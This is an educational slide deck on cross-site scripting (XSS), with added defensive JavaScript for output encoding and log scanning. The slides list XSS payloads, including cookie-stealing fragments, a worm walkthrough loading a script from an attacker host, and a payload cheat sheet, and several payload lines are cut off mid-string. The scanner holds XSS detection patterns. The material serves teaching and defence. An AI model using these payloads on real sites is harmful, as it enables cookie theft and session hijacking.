
XSS 101 Jason Clark 12/20.




1 XSS 101 Jason Clark 12/20

2 Agenda slide
- XSS Explained
- XSS Types
- XSS "Fingerprinting"
- What can you do with XSS?
- XSS Examples
- Mitigating XSS (Basics and Fortinet)

3 XSS Explained
- Web app vulnerability that allows code injection and cross-site commands
  - Java, PHP, CGI, ASP, HTML, DHTML
  - i.e. JavaScript provides the ability to create an iframe within a site, thus allowing cross-site commands
- The attack takes advantage of the way HTML code is interpreted by the browser
- The majority of sites do not filter user input
  - i.e. encoding 'spaces', #, <, >, and XSS characters such as ; " { (within <script> tags)
- Typically involves "social engineering"
  - Spoofed with an encoded malicious URL
- XSS security is commonly overlooked due to lack of impact on the server
- XSS can be completely transparent to the client
- Common and evasive attack due to the client-side vulnerability, i.e. it does not directly attack the vulnerable web server

4 XSS Explained: Myths
- Myth: XSS always involves "crossing sites"
  - i.e. web defacement, crafted URLs
  - i.e. iframes populated with legitimate websites
- Myth: the user needs to actively select a link or URL
  - XSS attacks can be exploited via HTML emails, message boards, guestbooks...
  - Using 'onmouseover', users only need to move the mouse over an active link: <a onmouseover="alert('testing');">XSS</a>
  - Using window.onload, scripts may be executed by simply viewing an email or web page: <a href=" window.onload="alert('document.cookie');">cnn.com</a> <script>document.location="

5 Agenda slide
- XSS Explained
- XSS Types
- XSS "Fingerprinting"
- What can you do with XSS?
- XSS Examples
- Mitigating XSS (Basics and Fortinet)

6 DOM Based XSS
- Document Object Model
  - API which defines how documents are structured and accessed, i.e. allows XML to be presented as a document on various systems
  - Defines cross-domain controls (scripts may not be run across domains, except in the local zone)
- DOM Based XSS
  - Code is not submitted to the web server (in most cases): RSS pages, InetE local pages, ...
  - Also referred to as client-side XSS
  - Bypasses the client-side sandbox
  - Difficult to detect (and secure)
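The "code is not submitted to the web server" point above, as an added example that is not part of the slides: it shows which part of a URL a browser sends to the server and which part stays in the client, and how the same fragment is inert or live depending on whether the client-side script encodes it before writing it into the page. The page name, the URL and the innerHTML-style renderers are constructed for this example; the alert probe is the one the deck uses.

```javascript
// Added example (not from the slides): why DOM-based XSS is invisible to the
// server, and why the sink, not the source, decides whether the probe fires.
// Assumptions: a Node.js runtime; the page name and URL are constructed.

// Split a URL the way a browser does: everything up to the fragment goes in
// the HTTP request, the fragment stays in the client.
function splitRequest(urlString) {
  const u = new URL(urlString);
  return {
    sentToServer: u.pathname + u.search,   // what appears in server logs
    clientOnly: u.hash,                     // "#..." never leaves the browser
  };
}

// Minimal HTML encoding for text placed into an element body.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable pattern: the client script copies the fragment straight into
// markup (the innerHTML sink). Nothing here ever touched the server.
function renderUnsafe(fragment) {
  const name = decodeURIComponent(fragment.slice(1));
  return '<h1>Welcome ' + name + '</h1>';
}

// Hardened pattern: same data, but encoded before it reaches the sink (the
// string equivalent of assigning textContent instead of innerHTML).
function renderSafe(fragment) {
  const name = decodeURIComponent(fragment.slice(1));
  return '<h1>Welcome ' + escapeHtml(name) + '</h1>';
}

// Constructed link carrying the alert probe from the slides in its fragment.
const link = 'https://example.test/welcome.html?lang=en#' +
  encodeURIComponent("<script>alert('testing');</script>");

const parts = splitRequest(link);
console.log('server sees  :', parts.sentToServer);
console.log('unsafe render:', renderUnsafe(parts.clientOnly));
console.log('safe render  :', renderSafe(parts.clientOnly));
```

Because `sentToServer` never contains the fragment, a server-side filter or log review cannot see this class of injection at all; the only place to fix or detect it is the client-side code that reads `location.hash`.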

7 DOM Based Example
- Attacker chooses a vulnerable web page on a victim host
  - IE7 navcancl.htm design flaw
- Attacker crafts a link which exploits navcancl.htm
  - res://ieframe.dll/navcancl.htm#
  - res://ieframe.dll/navcancl.htm#
  - Or simply
  - Note: all code after the fragment '#' does not get submitted to the server
- XSS'd! The attacker now has the ability to execute arbitrary code on behalf of the user

9 Non-Persistent XSS
- Most common XSS attack
- Attacker typically needs to supply a crafted URL to the victim
- Client data is processed by server-side scripting, i.e. the server embeds <script> in the web page, which is executed by the client browser
- Vulnerable pages will display data without encoding HTML or filtering, i.e. search engines which display the keyword search back to the user
- Search engines, forms...

10 Non-Persistent XSS Example
- Attacker determines a vulnerable non-persistent site
  - <script>alert('testing');</script>
  - <a onmouseover="alert('testing');">XSS</a>
- Attacker crafts a malicious link to the site containing the instruction script
- Malicious link is encoded to look "friendly"
- Malicious link is sent to the end user via email with an intriguing title
- Depending on end-user security settings, the user either clicks on the link or it "auto loads"
- Web server/application executes the malicious JavaScript
  - Stolen cookies
  - Session hijacking
  - Attacker essentially has the "rights" of the victim

11 Non-Persistent XSS Example
- Attacker determines a vulnerable non-persistent site
  - <script>alert('XSS')</script>
- Attacker crafts a malicious link to the site containing the instruction script
- Malicious link is encoded to look "friendly"
- Malicious link is sent to the end user via email with an intriguing title
- Depending on end-user security settings, the user either clicks on the link or it "auto loads"
- Web server/application executes the malicious JavaScript
  - Stolen cookies
  - Session hijacking
  - Attacker essentially has the "rights" of the victim

12 Persistent XSS
- Most devastating and furthest-reaching attack
- Typically exploited by allowed (unfiltered) HTML injections
- Similar to non-persistent XSS, though there is no need to provide a crafted URL to the victim
- Unlimited code execution
- A vulnerable message board would typically allow all HTML tags
- User data is stored in a web DB or file system, i.e. guest books, message boards w/o encoding
- May be used to distribute XSS viruses

13 Persistent XSS Example
- Attacker determines a site vulnerable to persistent XSS
  - Ideally the attacker is looking for a high-traffic message board
- Attacker posts a controversial message with the expectation of multiple views, i.e. "Fortinet announces S1 filing, click here to read more"
- Or the attacker uses the window.onload function so the script is executed on view
- Victim selects the link in the message board post, or simply views the page with active code
- XSS'd! At this point various payload functions can be performed: cookie stealing, Trojan download, key logging, XSS worm propagation
  - <img src="javascript:document.location(' . (document.cookie));">
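For the non-persistent and persistent cases described above (slides 9 through 13), an added example that is not from the deck: it contrasts a strip-`<script>` input filter, which lets the deck's onmouseover probe straight through, with output encoding at render time and an attribute-free tag allow-list, both of which neutralize every stored value regardless of what it contains. The in-memory post store and the three posts are constructed; the two probes are the ones the slides use.

```javascript
// Added example (not from the slides): why "filter <script> on the way in"
// is not enough for a message board, and what output encoding does instead.
// Assumptions: Node.js; the posts and the in-memory "database" are constructed.

// Naive input filter: strip <script> blocks, allow everything else.
function stripScriptTags(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Encode the five characters that change meaning inside an HTML body or a
// quoted attribute value. Applied at render time, to every stored value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Allow-list alternative for a board that wants some markup: encode
// everything, then re-enable only bare <b>, <i> and <p> (no attributes).
function renderAllowList(text) {
  return escapeHtml(text).replace(/&lt;(\/?)(b|i|p)&gt;/gi, '<$1$2>');
}

// In-memory stand-in for the board's storage.
const posts = [];
function storePost(author, body) { posts.push({ author, body }); return posts.length; }

// Three renderers over the same stored data.
function renderWithInputFilter() {     // vulnerable: trusts stored data
  return posts.map(p => `<p><b>${p.author}</b>: ${stripScriptTags(p.body)}</p>`).join('\n');
}
function renderEncoded() {             // hardened: encode at the sink
  return posts.map(p => `<p><b>${escapeHtml(p.author)}</b>: ${escapeHtml(p.body)}</p>`).join('\n');
}
function renderMarkupAllowList() {     // hardened, with limited formatting
  return posts.map(p => `<p><b>${escapeHtml(p.author)}</b>: ${renderAllowList(p.body)}</p>`).join('\n');
}

// Rough check for the two probe shapes the slides use: a real <script> tag,
// or an on* event-handler attribute inside a real tag. Encoded text has no
// literal '<', so it cannot match.
function containsActiveContent(html) {
  return /<script\b|<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed posts: one benign, then the two probes from the slides.
storePost('alice', 'Great <b>talk</b> today');
storePost('probe1', "<script>alert('testing');</script>");
storePost('probe2', '<a onmouseover="alert(\'testing\');">XSS</a>');

console.log('input filter :', containsActiveContent(renderWithInputFilter()));  // true
console.log('encoded      :', containsActiveContent(renderEncoded()));          // false
console.log('allow-list   :', containsActiveContent(renderMarkupAllowList()));  // false
```

The same three renderers apply to the non-persistent case; the only difference is that the value comes from the request instead of `posts`. Encoding belongs at the point where data meets markup, because the stored data has already passed every input check by the time it is rendered.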

14 XSS Worms
- SCRAPE
  - Utilize external engines to identify victims, such as xssed.com or search engines
  - Attacker creates dynamic scripts which parse xssed.com, extract attack vector info, then propagate the XSS worm via victim sites
- SPECIFIC
  - Typically targets specific victims
  - Purpose is to remain on the target, propagating within a single server or app, i.e. Samy XSS worm (MySpace XSS worm)
- GENERIC
  - No specific target application
  - Exploits generalized variables
  - Example

15 XSS Worms Example
- Attacker posts a link to a vulnerable high-traffic web forum (say )
- A Java or PHP script utilizes a hidden iframe which executes <script src=attackersite/worm.js></script>
- The script contains a target iframe of /8 as well as get_random for running through the remainder of the subnet (exploiting vulnerable sites)
  - Note: there is a little more to this, such as + address + "/index.php
  - A random address is inserted in the address and index.php will (hopefully) be resident
- At this point, each time the page is viewed the script is executed, which in turn runs through the entire class A subnet propagating the XSS worm/virus

16 Agenda slide
- XSS Explained
- XSS Types
- XSS "Fingerprinting"
- What can you do with XSS?
- XSS Examples
- Mitigating XSS (Basics and Fortinet)

17 Determining Vulnerable Sites
- Public Sites
- Scanners
  - Nikto
  - Too many to mention...
- Scripts
  - Use on search boxes, forms, web accounts, bank logins
  - <script>alert('xsstesting');</script>
- Firefox
  - XSS Me
  - Tamper Data
  - Many more...

18 Agenda slide
- XSS Explained
- XSS Types
- XSS "Fingerprinting"
- What can you do with XSS?
- XSS Examples
- Mitigating XSS (Basics and Fortinet)

19 What now? What can I do with XSS?
- Cookie theft
- Session riding/hijacking (CSRF)
- False advertisements/free advertising
- Hit stealing
- Identity theft
- Web page defacement
- XSS worm propagation
- Tools
  - BeEF
  - XSS-Proxy
  - Backframe
  - Java, PHP, CGI, HTML, etc.

20 Agenda slide
- XSS Explained
- XSS Types
- XSS "Fingerprinting"
- What can you do with XSS?
- XSS Examples/Tools
- Mitigating XSS (Basics and Fortinet)

21 XSS Examples and Tools
- Scripts
  - <script>document.location="
  - <script> alert(document.cookie) </script>
  - <a
  - <a href="javascript:
  - src="
  - res://ieframe.dll/navcancl.htm#
  - about:cancel#
  - <iframe src=
- Tools
  - BeEF
  - XSS-Proxy
  - Backframe
  - Java, Perl, CGI, HTML, etc.

24 Agenda slide
- XSS Explained
- XSS Types
- Determining Vulnerable Sites
- What can you do with XSS?
- XSS Examples/Tools
- Mitigating XSS (Basics and Fortinet)

25 Mitigating XSS
- Input filtering
  - Allow only expected/necessary user input
- Web Application Firewalls: feature request for FortiGate!
- Antivirus: known XSS worms, phishing emails
- Antispam: potential phishing emails
- JavaScript control: block <script> functions
- FortiGuard Web Filtering: block known malicious sites
- Intrusion Prevention
  - XSS signatures
  - Custom signatures for user filtering
- End user controls
  - Enforcing browser security
- Patch management
  - Keeping browser/OS patches up-to-date
- FortiClient! Web, AV, IPS, antispam, anti-grayware
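The "custom signatures" item above, as an added example that is not from the deck or from Fortinet: a small check over web-server access-log lines that URL-decodes the query string (a bounded number of rounds, so a double-encoded link that "looks friendly" is still seen) and reports the requests carrying the probe shapes the slides use. The log format is Common Log Format; the log lines and client addresses are constructed.

```javascript
// Added example (not from the slides or Fortinet): a custom XSS signature
// check over access-log lines. Assumptions: Node.js; SAMPLE_LOG is constructed.

// Patterns worth alerting on in a query string. Deliberately narrow: the goal
// is a high-signal signature, not a complete grammar of XSS.
const SIGNATURES = [
  { name: 'script-tag',     re: /<\s*script\b/i },
  { name: 'event-handler',  re: /<[a-z][^>]*\son\w+\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'iframe-tag',     re: /<\s*iframe\b/i },
];

// Decode percent-encoding repeatedly, but a bounded number of times, so that
// %253C (double-encoded '<') does not slip past the signatures.
function fullyDecode(s, rounds = 3) {
  let cur = s, prev;
  for (let i = 0; i < rounds && cur !== prev; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur.replace(/\+/g, ' ')); } catch (e) { break; }
  }
  return cur;
}

// Parse a Common Log Format line into client, timestamp, method, target, status.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], target: m[4], status: m[5] };
}

// Return one finding per matching signature per line.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    const qIdx = entry.target.indexOf('?');
    if (qIdx < 0) continue;                       // only query strings are checked
    const decoded = fullyDecode(entry.target.slice(qIdx + 1));
    for (const sig of SIGNATURES) {
      if (sig.re.test(decoded)) {
        findings.push({ client: entry.client, time: entry.time, signature: sig.name, decoded });
      }
    }
  }
  return findings;
}

// Constructed sample log. Line 2 carries the slides' alert probe once-encoded;
// line 3 carries the onmouseover probe double-encoded.
const SAMPLE_LOG = [
  '203.0.113.5 - - [20/Dec/2007:10:00:01 +0000] "GET /search?q=fortigate HTTP/1.1" 200 512',
  '203.0.113.7 - - [20/Dec/2007:10:00:02 +0000] "GET /search?q=%3Cscript%3Ealert(%27testing%27)%3B%3C%2Fscript%3E HTTP/1.1" 200 640',
  '203.0.113.9 - - [20/Dec/2007:10:00:03 +0000] "GET /search?q=%253Ca%2520onmouseover%253D%2522alert(%2527testing%2527)%253B%2522%253EXSS HTTP/1.1" 200 640',
  '203.0.113.11 - - [20/Dec/2007:10:00:04 +0000] "GET /welcome.html HTTP/1.1" 200 128',
];

console.log(scanAccessLog(SAMPLE_LOG));
```

A 200 status on a flagged line is the interesting case: it means the application reflected the request rather than rejecting it, which is what the non-persistent slides describe. Note that this check sees only what reaches the server; DOM-based injections carried in the fragment never appear in these lines.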

26 The End Disclaimer: This presentation is meant to educate the security professional in hopes of creating awareness of Cross Site Scripting. I am not responsible for any scripts contained or the use thereof within this documentation

